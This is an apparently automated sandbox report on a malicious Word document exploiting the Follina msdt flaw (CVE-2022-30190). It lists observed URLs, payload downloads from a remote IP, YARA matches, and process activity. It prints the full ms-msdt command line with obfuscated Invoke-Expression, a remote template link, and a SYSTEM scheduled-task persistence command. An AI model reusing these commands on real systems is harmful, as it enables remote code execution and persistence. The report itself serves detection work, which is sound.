                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://graph.ppe.windows.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://graph.ppe.windows.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://graph.windows.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://graph.windows.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://invites.office.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://lifecycle.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://login.microsoftonline.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://login.windows.local
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://management.azure.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://management.azure.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://messaging.engagement.office.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://messaging.office.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ncus.contentsync.
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ncus.pagecontentsync.
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://officeapps.live.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://onedrive.live.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://onedrive.live.com/embed?
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://osi.office.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://otelrules.azureedge.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office365.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office365.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://pages.store.office.com/review/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://powerlift.acompli.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                            Source: global traffic | HTTP traffic detected: GET /123.RES HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) | Accept-Encoding: gzip, deflate | Host: 185.234.247.119 | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /123.RES HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) | Accept-Encoding: gzip, deflate | Host: 185.234.247.119 | If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT | If-None-Match: "6299dd5d-1861" | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /1676044147.dat HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: 185.234.247.119 | Connection: Keep-Alive
                            Source: 00000007.00000002.544430061.00000000029A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.544117188.0000000002910000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.544599667.00000000029A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.545886890.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: Process Memory Space: msdt.exe PID: 6524, type: MEMORYSTR | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 26_2_049ED447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 26_2_049ED959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_0536D959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_0536D447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_05B9D959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_05B9D447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose
                            Source: DiagPackage.dll.mui.7.dr | Static PE information: No import functions for PE file found
                            Source: DiagPackage.dll.7.dr | Static PE information: No import functions for PE file found
                            Source: DiagPackage.dll.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Section loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: jr3.dll
                            Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
                            Source: doc782.docx | Virustotal: Detection: 23%
                            Source: doc782.docx | ReversingLabs: Detection: 17%
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                            Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6719.tmp" "c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP"
                            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AFF.tmp" "c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP"
                            Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
                            Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
                            Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
                            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES51A8.tmp" "c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP"
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59
                            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t.A"
                            Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t.A"
                            Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
                            Source: doc782.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\doc782.docx
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{DF46434D-AC68-4BBF-9884-01277EAB76C6} - OProcSessId.dat
                            Source: classification engine | Classification label: mal100.troj.expl.evad.winDOCX@31/32@0/1
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 26_2_049EE400 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 26_2_049EB96A CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification
                            Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\{51E5EFC8-945D-4846-978B-9B2003A58611}
                            Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\{38FD291B-687C-4AD1-84D6-EB9E83258CEC}
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
                            Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{51E5EFC8-945D-4846-978B-9B2003A58611}
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
                            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\SysWOW64\msdt.exe | Automated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
                            Source: Window Recorder | Window detected: More than 3 window changes detected
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
                            Source: Binary string: amstream.pdb source: explorer.exe, 00000021.00000003.495697141.0000000004B92000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.496818765.0000000005602000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.501625478.0000000004E93000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000021.00000003.495697141.0000000004B92000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.496818765.0000000005602000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.501625478.0000000004E93000.00000004.00000800.00020000.00000000.sdmp
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EEEBB LoadLibraryA,GetProcAddress,26_2_049EEEBB
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.cmdline
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.cmdline
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.cmdline

                            Persistence and Installation Behavior

                            Source: document.xml.relsExtracted files from sample: mhtml:http://185.234.247.119:80/123.res!http://185.234.247.119:80/123.res
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\DiagPackage.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.dllJump to dropped file
